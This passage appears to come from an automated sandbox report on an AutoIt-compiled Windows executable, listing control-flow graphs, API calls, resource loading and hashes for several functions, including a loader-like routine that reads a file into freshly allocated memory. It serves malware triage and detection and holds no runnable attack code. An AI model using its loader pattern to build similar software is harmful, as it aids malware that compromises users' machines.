48109->48049 48110->48058 48111->48061 48112->48066 48113->48071 48114->48074 48115->48079 48116->48083 48117->48075 48118->48080 48119->48084 48120->48087 48121->48087 48122->48087 48123->48087 48124->48041 48125->48046 48126->48051 48127->48055 48128->48059 48129->48065 48130->48070 48132 c2aec9 22 API calls 48131->48132 48133 c24c78 48132->48133 48133->48095 48134 c242de 48135 c2a961 22 API calls 48134->48135 48136 c242f5 GetVersionExW 48135->48136 48137 c26b57 22 API calls 48136->48137 48138 c24342 48137->48138 48139 c293b2 22 API calls 48138->48139 48142 c24378 48138->48142 48140 c2436c 48139->48140 48141 c237a0 22 API calls 48140->48141 48141->48142 48143 c2441b GetCurrentProcess IsWow64Process 48142->48143 48150 c637df 48142->48150 48144 c24437 48143->48144 48145 c63824 GetSystemInfo 48144->48145 48146 c2444f LoadLibraryA 48144->48146 48147 c24460 GetProcAddress 48146->48147 48148 c2449c GetSystemInfo 48146->48148 48147->48148 48151 c24470 GetNativeSystemInfo 48147->48151 48149 c24476 48148->48149 48152 c24481 48149->48152 48153 c2447a FreeLibrary 48149->48153 48151->48149 48153->48152

                                                                      Executed Functions

                                                                      Function 00C242DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 c242de-c2434d call c2a961 GetVersionExW call c26b57 5 c63617-c6362a 0->5 6 c24353 0->6 7 c6362b-c6362f 5->7 8 c24355-c24357 6->8 9 c63632-c6363e 7->9 10 c63631 7->10 11 c63656 8->11 12 c2435d-c243bc call c293b2 call c237a0 8->12 9->7 13 c63640-c63642 9->13 10->9 17 c6365d-c63660 11->17 28 c243c2-c243c4 12->28 29 c637df-c637e6 12->29 13->8 16 c63648-c6364f 13->16 16->5 19 c63651 16->19 20 c63666-c636a8 17->20 21 c2441b-c24435 GetCurrentProcess IsWow64Process 17->21 19->11 20->21 22 c636ae-c636b1 20->22 24 c24437 21->24 25 c24494-c2449a 21->25 26 c636b3-c636bd 22->26 27 c636db-c636e5 22->27 30 c2443d-c24449 24->30 25->30 31 c636bf-c636c5 26->31 32 c636ca-c636d6 26->32 34 c636e7-c636f3 27->34 35 c636f8-c63702 27->35 28->17 33 c243ca-c243dd 28->33 36 c63806-c63809 29->36 37 c637e8 29->37 38 c63824-c63828 GetSystemInfo 30->38 39 c2444f-c2445e LoadLibraryA 30->39 31->21 32->21 40 c63726-c6372f 33->40 41 c243e3-c243e5 33->41 34->21 43 c63704-c63710 35->43 44 c63715-c63721 35->44 45 c637f4-c637fc 36->45 46 c6380b-c6381a 36->46 42 c637ee 37->42 47 c24460-c2446e GetProcAddress 39->47 48 c2449c-c244a6 GetSystemInfo 39->48 52 c63731-c63737 40->52 53 c6373c-c63748 40->53 50 c243eb-c243ee 41->50 51 c6374d-c63762 41->51 42->45 43->21 44->21 45->36 46->42 54 c6381c-c63822 46->54 47->48 55 c24470-c24474 GetNativeSystemInfo 47->55 49 c24476-c24478 48->49 56 c24481-c24493 49->56 57 c2447a-c2447b FreeLibrary 49->57 58 c243f4-c2440f 50->58 59 c63791-c63794 50->59 60 c63764-c6376a 51->60 61 c6376f-c6377b 51->61 52->21 53->21 54->45 55->49 57->56 63 c63780-c6378c 58->63 64 c24415 58->64 59->21 62 c6379a-c637c1 59->62 60->21 61->21 65 c637c3-c637c9 62->65 66 c637ce-c637da 62->66 63->21 64->21 65->21 66->21
                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 00C2430D
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                      • GetCurrentProcess.KERNEL32(?,00CBCB64,00000000,?,?), ref: 00C24422
                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00C24429
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00C24454
                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C24466
                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00C24474
                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C2447B
                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00C244A0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                      • API String ID: 3290436268-3101561225
                                                                      • Opcode ID: a28b92ce42c0969d0580c80d95df29910caf09e4f9bc409f5b49c04457be9cea
                                                                      • Instruction ID: df395008ea6071cf081cf4119e593a77fb469452163e82176e35f97dfa2267d8
                                                                      • Opcode Fuzzy Hash: a28b92ce42c0969d0580c80d95df29910caf09e4f9bc409f5b49c04457be9cea
                                                                      • Instruction Fuzzy Hash: 00A1A47695A2D4DFC725D76DBC813BD7FE47B26300B0C58A9E88593A32D220460DDB23
                                                                      Function 00C242A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 319 c242a2-c242ba CreateStreamOnHGlobal 320 c242da-c242dd 319->320 321 c242bc-c242d3 FindResourceExW 319->321 322 c242d9 321->322 323 c635ba-c635c9 LoadResource 321->323 322->320 323->322 324 c635cf-c635dd SizeofResource 323->324 324->322 325 c635e3-c635ee LockResource 324->325 325->322 326 c635f4-c635fc 325->326 327 c63600-c63612 326->327 327->322
                                                                      APIs
                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C250AA,?,?,00000000,00000000), ref: 00C242B2
                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C250AA,?,?,00000000,00000000), ref: 00C242C9
                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00C250AA,?,?,00000000,00000000,?,?,?,?,?,?,00C24F20), ref: 00C635BE
                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00C250AA,?,?,00000000,00000000,?,?,?,?,?,?,00C24F20), ref: 00C635D3
                                                                      • LockResource.KERNEL32(00C250AA,?,?,00C250AA,?,?,00000000,00000000,?,?,?,?,?,?,00C24F20,?), ref: 00C635E6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: SCRIPT
                                                                      • API String ID: 3051347437-3967369404
                                                                      • Opcode ID: 75c7461af66aa40c8b018f6f9a6b3ca241d12a061dc769340d51e6fffe336d2f
                                                                      • Instruction ID: 575fb7980e9cdbe4cb7df6f0d7a614ef3f7f49f473b4a454a3f654ad45f4298a
                                                                      • Opcode Fuzzy Hash: 75c7461af66aa40c8b018f6f9a6b3ca241d12a061dc769340d51e6fffe336d2f
                                                                      • Instruction Fuzzy Hash: 45118E74200700FFDB258BA6EC88F6B7BB9EBC5B51F104269F412D6690DB71DD008631
                                                                      Function 00C22CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00C22D07
                                                                      • RegisterClassExW.USER32(00000030), ref: 00C22D31
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C22D42
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00C22D5F
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C22D6F
                                                                      • LoadIconW.USER32(000000A9), ref: 00C22D85
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C22D94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: 48cb3919f34594d187c80732589acb9d7ca6f88662b16abad4bad662f7a32075
                                                                      • Instruction ID: c874d4120f9da2bdab68b8a3a19fa68037f7382f9eb0b89d504458baa29af947
                                                                      • Opcode Fuzzy Hash: 48cb3919f34594d187c80732589acb9d7ca6f88662b16abad4bad662f7a32075
                                                                      • Instruction Fuzzy Hash: EB2193B5911318EFDB00DFA4E889BEDBBB4FB08701F14421AF951A62A0DBB55644CF91
                                                                      Function 00C6065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 68 c6065b-c6068b call c6042f 71 c606a6-c606b2 call c55221 68->71 72 c6068d-c60698 call c4f2c6 68->72 78 c606b4-c606c9 call c4f2c6 call c4f2d9 71->78 79 c606cb-c60714 call c6039a 71->79 77 c6069a-c606a1 call c4f2d9 72->77 88 c6097d-c60983 77->88 78->77 86 c60716-c6071f 79->86 87 c60781-c6078a GetFileType 79->87 90 c60756-c6077c GetLastError call c4f2a3 86->90 91 c60721-c60725 86->91 92 c607d3-c607d6 87->92 93 c6078c-c607bd GetLastError call c4f2a3 CloseHandle 87->93 90->77 91->90 97 c60727-c60754 call c6039a 91->97 95 c607df-c607e5 92->95 96 c607d8-c607dd 92->96 93->77 107 c607c3-c607ce call c4f2d9 93->107 100 c607e9-c60837 call c5516a 95->100 101 c607e7 95->101 96->100 97->87 97->90 110 c60847-c6086b call c6014d 100->110 111 c60839-c60845 call c605ab 100->111 101->100 107->77 118 c6087e-c608c1 110->118 119 c6086d 110->119 111->110 117 c6086f-c60879 call c586ae 111->117 117->88 120 c608e2-c608f0 118->120 121 c608c3-c608c7 118->121 119->117 125 c608f6-c608fa 120->125 126 c6097b 120->126 121->120 124 c608c9-c608dd 121->124 124->120 125->126 127 c608fc-c6092f CloseHandle call c6039a 125->127 126->88 130 c60963-c60977 127->130 131 c60931-c6095d GetLastError call c4f2a3 call c55333 127->131 130->126 131->130
                                                                      APIs
                                                                        • Part of subcall function 00C6039A: CreateFileW.KERNELBASE(00000000,00000000,?,00C60704,?,?,00000000,?,00C60704,00000000,0000000C), ref: 00C603B7
                                                                      • GetLastError.KERNEL32 ref: 00C6076F
                                                                      • __dosmaperr.LIBCMT ref: 00C60776
                                                                      • GetFileType.KERNELBASE(00000000), ref: 00C60782
                                                                      • GetLastError.KERNEL32 ref: 00C6078C
                                                                      • __dosmaperr.LIBCMT ref: 00C60795
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C607B5
                                                                      • CloseHandle.KERNEL32(?), ref: 00C608FF
                                                                      • GetLastError.KERNEL32 ref: 00C60931
                                                                      • __dosmaperr.LIBCMT ref: 00C60938
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                      • String ID: H
                                                                      • API String ID: 4237864984-2852464175
                                                                      • Opcode ID: b473bc92d311320b5b8d5c9a4614c67877c4124be1115801b4c826cc0852addd
                                                                      • Instruction ID: 4498fb81f6e140ada7c5fb8000bc93d0eb991f4a11b314791d475d23cc92d894
                                                                      • Opcode Fuzzy Hash: b473bc92d311320b5b8d5c9a4614c67877c4124be1115801b4c826cc0852addd
                                                                      • Instruction Fuzzy Hash: 8FA11932A141048FDF29EF68D891BAE7BE1AB46320F24015DF815AB3D2D7319D13DB51
                                                                      Function 00C2344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00C23A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CF1418,?,00C22E7F,?,?,?,00000000), ref: 00C23A78
                                                                        • Part of subcall function 00C23357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C23379
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C2356A
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C6318D
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C631CE
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C63210
                                                                      • _wcslen.LIBCMT ref: 00C63277
                                                                      • _wcslen.LIBCMT ref: 00C63286
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 98802146-2727554177
                                                                      • Opcode ID: 34f9f96017d06a0985e3b2cc042a986032d0249ed63c27ef3129f53d3e2f8b4b
                                                                      • Instruction ID: 832550c77ee87eedf93035d7e0ce599f1b3feed97b8dd6a4a2619ae642de9620
                                                                      • Opcode Fuzzy Hash: 34f9f96017d06a0985e3b2cc042a986032d0249ed63c27ef3129f53d3e2f8b4b
                                                                      • Instruction Fuzzy Hash: EA7158B14043119FC314EF69E881AAFBBE8FF95740F40082EF555831B1EB349A49DB62
                                                                      Function 00C22B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00C22B8E
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00C22B9D
                                                                      • LoadIconW.USER32(00000063), ref: 00C22BB3
                                                                      • LoadIconW.USER32(000000A4), ref: 00C22BC5
                                                                      • LoadIconW.USER32(000000A2), ref: 00C22BD7
                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C22BEF
                                                                      • RegisterClassExW.USER32(?), ref: 00C22C40
                                                                        • Part of subcall function 00C22CD4: GetSysColorBrush.USER32(0000000F), ref: 00C22D07
                                                                        • Part of subcall function 00C22CD4: RegisterClassExW.USER32(00000030), ref: 00C22D31
                                                                        • Part of subcall function 00C22CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C22D42
                                                                        • Part of subcall function 00C22CD4: InitCommonControlsEx.COMCTL32(?), ref: 00C22D5F
                                                                        • Part of subcall function 00C22CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C22D6F
                                                                        • Part of subcall function 00C22CD4: LoadIconW.USER32(000000A9), ref: 00C22D85
                                                                        • Part of subcall function 00C22CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C22D94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: f07bbd3559d42480ec2bba9df5dd9fdec49a7cc65753cbf197c3982c187eb96b
                                                                      • Instruction ID: 3a1c936d2516d1a4c3ffb925519768383f89cebc6fa2f65d5bb8d16d80917558
                                                                      • Opcode Fuzzy Hash: f07bbd3559d42480ec2bba9df5dd9fdec49a7cc65753cbf197c3982c187eb96b
                                                                      • Instruction Fuzzy Hash: 04211A74E00315EBDB109FA6EC95BBE7FB4FB48B50F08011AEA00A66B0D7B10548DF91
                                                                      Function 00C23170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 209 c23170-c23185 210 c23187-c2318a 209->210 211 c231e5-c231e7 209->211 213 c231eb 210->213 214 c2318c-c23193 210->214 211->210 212 c231e9 211->212 215 c231d0-c231d8 DefWindowProcW 212->215 216 c231f1-c231f6 213->216 217 c62dfb-c62e23 call c218e2 call c3e499 213->217 218 c23265-c2326d PostQuitMessage 214->218 219 c23199-c2319e 214->219 220 c231de-c231e4 215->220 222 c231f8-c231fb 216->222 223 c2321d-c23244 SetTimer RegisterWindowMessageW 216->223 255 c62e28-c62e2f 217->255 221 c23219-c2321b 218->221 225 c231a4-c231a8 219->225 226 c62e7c-c62e90 call c8bf30 219->226 221->220 227 c23201-c23214 KillTimer call c230f2 call c23c50 222->227 228 c62d9c-c62d9f 222->228 223->221 230 c23246-c23251 CreatePopupMenu 223->230 231 c231ae-c231b3 225->231 232 c62e68-c62e77 call c8c161 225->232 226->221 250 c62e96 226->250 227->221 234 c62dd7-c62df6 MoveWindow 228->234 235 c62da1-c62da5 228->235 230->221 239 c62e4d-c62e54 231->239 240 c231b9-c231be 231->240 232->221 234->221 242 c62dc6-c62dd2 SetFocus 235->242 243 c62da7-c62daa 235->243 239->215 244 c62e5a-c62e63 call c80ad7 239->244 248 c23253-c23263 call c2326f 240->248 249 c231c4-c231ca 240->249 242->221 243->249 251 c62db0-c62dc1 call c218e2 243->251 244->215 248->221 249->215 249->255 250->215 251->221 255->215 256 c62e35-c62e43 call c230f2 call c23837 255->256 264 c62e48 256->264 264->215
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00C2316A,?,?), ref: 00C231D8
                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00C2316A,?,?), ref: 00C23204
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C23227
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00C2316A,?,?), ref: 00C23232
                                                                      • CreatePopupMenu.USER32 ref: 00C23246
                                                                      • PostQuitMessage.USER32(00000000), ref: 00C23267
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: 2fcfcf1e2d30aac5eb5f37de291e4d9397c7023a76963bd9d30700fee15e490c
                                                                      • Instruction ID: 3e8166f0ac0d4102081a277bd88c79e605cdfbd6e5097357f70fc8cde74ceb36
                                                                      • Opcode Fuzzy Hash: 2fcfcf1e2d30aac5eb5f37de291e4d9397c7023a76963bd9d30700fee15e490c
                                                                      • Instruction Fuzzy Hash: 844119352402A4E7DF251B78BD8DB7D3A29EB05350F080125F951969E2CB79CB40E7A2
                                                                      Function 0314C1A0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 265 314c1a0-314c24e call 3149bb0 268 314c255-314c27b call 314d0b0 CreateFileW 265->268 271 314c282-314c292 268->271 272 314c27d 268->272 277 314c294 271->277 278 314c299-314c2b3 VirtualAlloc 271->278 273 314c3cd-314c3d1 272->273 275 314c413-314c416 273->275 276 314c3d3-314c3d7 273->276 279 314c419-314c420 275->279 280 314c3e3-314c3e7 276->280 281 314c3d9-314c3dc 276->281 277->273 284 314c2b5 278->284 285 314c2ba-314c2d1 ReadFile 278->285 286 314c475-314c48a 279->286 287 314c422-314c42d 279->287 282 314c3f7-314c3fb 280->282 283 314c3e9-314c3f3 280->283 281->280 290 314c3fd-314c407 282->290 291 314c40b 282->291 283->282 284->273 292 314c2d3 285->292 293 314c2d8-314c318 VirtualAlloc 285->293 288 314c48c-314c497 VirtualFree 286->288 289 314c49a-314c4a2 286->289 294 314c431-314c43d 287->294 295 314c42f 287->295 288->289 290->291 291->275 292->273 296 314c31f-314c33a call 314d300 293->296 297 314c31a 293->297 298 314c451-314c45d 294->298 299 314c43f-314c44f 294->299 295->286 305 314c345-314c34f 296->305 297->273 302 314c45f-314c468 298->302 303 314c46a-314c470 298->303 301 314c473 299->301 301->279 302->301 303->301 306 314c351-314c380 call 314d300 305->306 307 314c382-314c396 call 314d110 305->307 306->305 313 314c398 307->313 314 314c39a-314c39e 307->314 313->273 315 314c3a0-314c3a4 CloseHandle 314->315 316 314c3aa-314c3ae 314->316 315->316 317 314c3b0-314c3bb VirtualFree 316->317 318 314c3be-314c3c7 316->318 317->318 318->268 318->273
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0314C271
                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0314C497
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileFreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 204039940-0
                                                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                      • Instruction ID: 96dca121e3196fabcca211532662adf5794f05ca87a3a81b787427c9b860a856
                                                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                      • Instruction Fuzzy Hash: D9A11775E01209EBDB14CFA4C998BEEBBB5FF48304F248199E505BB280D7759A81CF94
                                                                      Function 00C22C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 329 c22c63-c22cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                      APIs
                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C22C91
                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C22CB2
                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C21CAD,?), ref: 00C22CC6
                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C21CAD,?), ref: 00C22CCF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399
                                                                      • Opcode ID: 7f45a87ee89fdb4fa40aa68143275ab475a6abff42f4ac38a440e98b8b160040
                                                                      • Instruction ID: d87b1f67847f975d00776883f5f598a51ab7309dba1edf886e1e1f6441f0741b
                                                                      • Opcode Fuzzy Hash: 7f45a87ee89fdb4fa40aa68143275ab475a6abff42f4ac38a440e98b8b160040
                                                                      • Instruction Fuzzy Hash: 9EF0DA76940290BAEB311B17AC48FBB3EBDD7C7F60F04005AFD00A65B0C6615854DAB1
                                                                      Function 0314BF60 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

